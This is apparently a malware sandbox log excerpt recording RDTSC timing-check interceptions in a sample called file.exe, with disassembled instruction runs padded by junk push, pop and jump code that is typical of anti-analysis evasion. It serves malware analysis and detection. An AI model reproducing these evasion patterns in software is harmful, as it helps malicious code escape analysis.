                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672443 second address: 672459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA8Fh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672459 second address: 67245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67245F second address: 672465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672465 second address: 67246E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67246E second address: 672472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672472 second address: 6724BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7174BA6FE3h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F7174BA6FDFh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F7174BA6FE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676093 second address: 6760AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA92h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760AF second address: 6760BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FDCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760BF second address: 6760E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7174CEBA98h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760E0 second address: 6760E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760E8 second address: 6760EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6760EC second address: 6760F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62ECF2 second address: 62ECFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62ECFE second address: 62ED02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EE63 second address: 62EE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA94h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EE7C second address: 62EEAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FE5h 0x00000008 jo 00007F7174BA6FD6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7174BA6FDCh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EF4B second address: 62EF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F19B second address: 62F1BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F34B second address: 62F34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F95E second address: 62F962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA2F second address: 62FA73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F7174CEBA86h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007F7174CEBA8Ah 0x00000014 lea eax, dword ptr [ebp+1248E416h] 0x0000001a call 00007F7174CEBA96h 0x0000001f pushad 0x00000020 cld 0x00000021 popad 0x00000022 pop edx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F7174CEBA88h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA73 second address: 62FA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA79 second address: 62FA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FA7D second address: 62FAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2A57h], esi 0x00000015 popad 0x00000016 sub dword ptr [ebp+122D260Bh], eax 0x0000001c popad 0x0000001d jbe 00007F7174BA6FECh 0x00000023 lea eax, dword ptr [ebp+1248E3D2h] 0x00000029 mov edi, 49AA9864h 0x0000002e push eax 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FAC7 second address: 612771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F7174CEBA88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 adc dx, EE92h 0x0000002c call dword ptr [ebp+122D2A61h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push esi 0x00000035 jmp 00007F7174CEBA8Eh 0x0000003a pop esi 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676664 second address: 676668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676668 second address: 67666E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67666E second address: 676674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676674 second address: 67667B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67667B second address: 6766AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F7174BA6FDAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F7174BA6FD6h 0x00000016 jmp 00007F7174BA6FE7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF01B second address: 5EF03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA98h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676A80 second address: 676A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676A9C second address: 676AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676BEC second address: 676BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676BF0 second address: 676C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7174CEBA91h 0x0000000f jmp 00007F7174CEBA8Bh 0x00000014 jmp 00007F7174CEBA8Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676C2A second address: 676C42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7174BA6FD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F7174BA6FD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676C42 second address: 676C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676C46 second address: 676C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679972 second address: 679998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7174CEBA98h 0x0000000a jmp 00007F7174CEBA90h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F7174CEBA86h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679998 second address: 67999C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67999C second address: 6799B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7174CEBA86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F7174CEBA8Ch 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679536 second address: 679568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FDEh 0x00000008 jmp 00007F7174BA6FE5h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jl 00007F7174BA6FD6h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C316 second address: 67C322 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C322 second address: 67C326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C326 second address: 67C32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C32C second address: 67C336 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7174BA6FDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C744 second address: 67C74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C74A second address: 67C74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C74E second address: 67C752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C752 second address: 67C758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C758 second address: 67C761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C761 second address: 67C767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C767 second address: 67C76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6843C9 second address: 6843CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6843CD second address: 6843D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683436 second address: 68343C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68343C second address: 683447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683447 second address: 683451 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7174BA6FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6835D8 second address: 6835E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7174CEBA86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6840EB second address: 684110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FE3h 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pushad 0x0000000d js 00007F7174BA6FD6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687CE3 second address: 687D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F7174CEBA88h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7174CEBA91h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B63D second address: 68B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B646 second address: 68B650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7174CEBA86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B650 second address: 68B656 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED57C second address: 5ED593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F7174CEBA86h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B05C second address: 68B062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B062 second address: 68B066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691F36 second address: 691F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FDAh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7174BA6FE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691F5F second address: 691F65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6920D2 second address: 692103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7174BA6FEDh 0x0000000a pushad 0x0000000b jmp 00007F7174BA6FDDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692526 second address: 69252A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6927FD second address: 69280D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F7174BA6FDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692D60 second address: 692D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7174CEBA8Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693017 second address: 693034 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE7h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693034 second address: 693050 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F7174CEBA86h 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F7174CEBA86h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693050 second address: 693054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693054 second address: 693082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F7174CEBA9Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693082 second address: 69308A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69308A second address: 69308E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69308E second address: 693092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69337E second address: 69339C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F7174CEBA86h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174CEBA90h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69393A second address: 693944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7174BA6FD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693944 second address: 693948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693948 second address: 693957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7174BA6FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693957 second address: 69395D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69395D second address: 693962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693962 second address: 693983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Ch 0x00000007 ja 00007F7174CEBA97h 0x0000000d jmp 00007F7174CEBA8Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF69 second address: 69BF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF6D second address: 69BF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F7174CEBA93h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF8C second address: 69BF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0E9 second address: 69C0F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F7174CEBA86h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0F7 second address: 69C0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0FB second address: 69C0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C4BA second address: 69C4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F7174BA6FDCh 0x0000000c pop esi 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F7174BA6FDEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A48CB second address: 6A48D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A48D1 second address: 6A48D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A48D9 second address: 6A48EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F7174CEBA86h 0x0000000d jc 00007F7174CEBA86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A3A second address: 6A4A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7174BA6FD6h 0x0000000a rdtsc
